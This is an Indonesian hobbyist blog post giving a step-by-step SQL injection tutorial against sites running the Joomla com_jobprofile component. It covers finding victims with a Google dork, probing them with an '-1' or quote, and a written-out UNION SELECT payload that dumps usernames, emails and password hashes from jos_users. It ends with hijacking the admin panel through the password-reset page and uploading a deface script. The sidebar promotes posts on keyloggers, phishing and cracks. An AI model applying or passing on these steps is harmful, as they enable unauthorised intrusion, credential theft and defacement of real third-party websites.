SQL INJECTION 2014

Ya berjumpa lagi hehehe sekarang aku mau memberi tahu bagaimana cara sql injection.
Oke langsung aje


www.rahmadteknology.blogspot.com
 




Bahan yang dibutuhkan :
1. Dork-dork yang kreatif sesuai target, kalo males nyari dorknya ya nih ada Google Dork.
2. Kesabaran untuk mencari kesalahan pada web
3. Kalo males pake google dork ya pake software ini, Klik Buat Download tapi caranya beda yaaa :) ntar baru aku jelasin cara pake accunetic

Itu juga udah cukup buat otak atik web orang :).
Yaaa aku belajar ini sejak kelas 1 SMK lumayan seru.
Intinya cuma buat belajar yaa, mohon jgn merusak web orang.

Langkah-langkah dibawah :

* Langkah pertama yang harus kita lakukan adalah mencari target.
Silahkan gunakan dork yang ada misalnya untuk mencari target :
Dork => option=com_jobprofile
Pastekan ke mbah google
Dork digunakan dimesin pencari Goole (Google Serba Tahu)



* Selanjutnya kita cek web tersebut apakah bisa kita lanjutkan ke tahap selanjutnya.
Silahkan tambahkan ( – ) sebelum nomor ID
Pilih salah satu web yang mau di SQL
Contoh :
http://www.target.com/index.php/option=com_jobprofile&Itemid=61&task=profilesview&id=-1
Atau tambahkan tanda ( ‘ ) pada akhir Number ID
JIka muncul pesan “Error”  lanjutkan ke langkah selanjutnya
Catatan : www.target.com - isikan dengan web yang mau di SQL

* Selanjutnya kita Exploitasi web tersebut dengan Exploit dibawah :
Silahkan gabungkan exploitnya :
+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–

Letakan diakhir URL tersebut sehingga akan menjadi :
http://www.target.com/index.php/option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Nahh disitu akan keluar Email dan Tokennya silahkan copy dan simpan baik-baik.

* Sekarang masuk ke halaman reset password :
 tambahkan : /index.php?option=com_user&view=reset
Contoh :  http://www.target.com/index.php?option=com_user&view=reset

Oke udah, masukin email dan passwordnya yang tadi.
Sekarang masuk ke control panel web tersebut.
Silahkan ubah html pada web tersebut.
Atau bisa juga sobat masukkan/ upload Script deface sobat.
Kalo males buat scrip nih link buat nyari script EXPLOIT DB

Catatan!!!
Kalau tokennya mengandung symbol  $$$$ (Salt) maka token tidak akan bekerja.
Jadi cari target yang lain saja.

Jika ingin belajar lebih banyak cari aja di google hehehehe
Label:

TEKNO IT BELAJAR DUNIA KOMPUTER DAN INTERNET

Belajar Tentang Komputer | Internet | System Jaringan | Hacking | Dan Masih Banyak Lagi

About Me

Muhammad Rahmad Kurniawan. Diberdayakan oleh Blogger.

Blog Archive

Popular Posts

  • Google Dork 2014
    Oke ada yang suka bermain sql injection untuk menghack website, nah saya mau berbagi google dorknya nih. allinurl:*.php?txtCodiInfo= in...
  • Memperindah Tampilan Desktop
    Salam Blogger......? Oke kali ini mau berbagi sebuah software Rainmeter. Langsung aja deh no chit - chat hehehe Bahan - Bahan : 1. Rainm...
  • Wireshark Toolz Analisa
    Hay sobat pa kabar. Kali ini saya akan berbagi sebuah tools analisa yang bisa juga digunakan sebagai tools hacking. Ya wireshark ad...
  • Keylogger Terbaru 2014
    Oke kali ini saya akan memberika software keylogger Software keylogger ini berfungsi untuk merekam aktifitas dikomputer yang telah teri...
  • Cheat PB Online
    Ada yang suka maen PB tapi kesel karena banyak citer hehehe Nih aku kasi tau tempat chit yang selalu update Nih web yang selalu update ch...
  • Cara Hack Menggunakan Teknik Phising
     Salam Blogger. Ada yang tau ga cara hack mengugunkan phising atau fake login. Kalo blum nih aku mau berbagi. Sebelumnya sobat har...
  • Cheat Game Online Di FB
    Salam Blogger. Kali ini saya mau berbagi kumpulan cheat game FB Saya nyari kesana dan kemari susah banget dan jarang banget ada yang n...
  • Flappy Bird
    Oke kali ini saya mau berbagi game android Flappy Bird Yaa game yang sempat heboh di dunia maya ini ternyata lumayan bagus kalo biarpun ga...
  • Craagle Buat Cari Keygen, Crack, dan SN
    Salam blogger. Kali ini saya mau berbagi search engine yang namanya Craagle Ya software ini dibuat khusus untuk membantu mencari se...
  • SQL INJECTION 2014
    Ya berjumpa lagi hehehe sekarang aku mau memberi tahu bagaimana cara sql injection. Oke langsung aje  

Popular Posts

  • Google Dork 2014
    Oke ada yang suka bermain sql injection untuk menghack website, nah saya mau berbagi google dorknya nih. allinurl:*.php?txtCodiInfo= in...
  • Memperindah Tampilan Desktop
    Salam Blogger......? Oke kali ini mau berbagi sebuah software Rainmeter. Langsung aja deh no chit - chat hehehe Bahan - Bahan : 1. Rainm...
  • Wireshark Toolz Analisa
    Hay sobat pa kabar. Kali ini saya akan berbagi sebuah tools analisa yang bisa juga digunakan sebagai tools hacking. Ya wireshark ad...
  • Keylogger Terbaru 2014
    Oke kali ini saya akan memberika software keylogger Software keylogger ini berfungsi untuk merekam aktifitas dikomputer yang telah teri...
  • Cheat PB Online
    Ada yang suka maen PB tapi kesel karena banyak citer hehehe Nih aku kasi tau tempat chit yang selalu update Nih web yang selalu update ch...
  • Cara Hack Menggunakan Teknik Phising
     Salam Blogger. Ada yang tau ga cara hack mengugunkan phising atau fake login. Kalo blum nih aku mau berbagi. Sebelumnya sobat har...
  • Cheat Game Online Di FB
    Salam Blogger. Kali ini saya mau berbagi kumpulan cheat game FB Saya nyari kesana dan kemari susah banget dan jarang banget ada yang n...
  • Flappy Bird
    Oke kali ini saya mau berbagi game android Flappy Bird Yaa game yang sempat heboh di dunia maya ini ternyata lumayan bagus kalo biarpun ga...
  • Craagle Buat Cari Keygen, Crack, dan SN
    Salam blogger. Kali ini saya mau berbagi search engine yang namanya Craagle Ya software ini dibuat khusus untuk membantu mencari se...
  • SQL INJECTION 2014
    Ya berjumpa lagi hehehe sekarang aku mau memberi tahu bagaimana cara sql injection. Oke langsung aje  

Style3[OneRight]

Video Of Day

Style4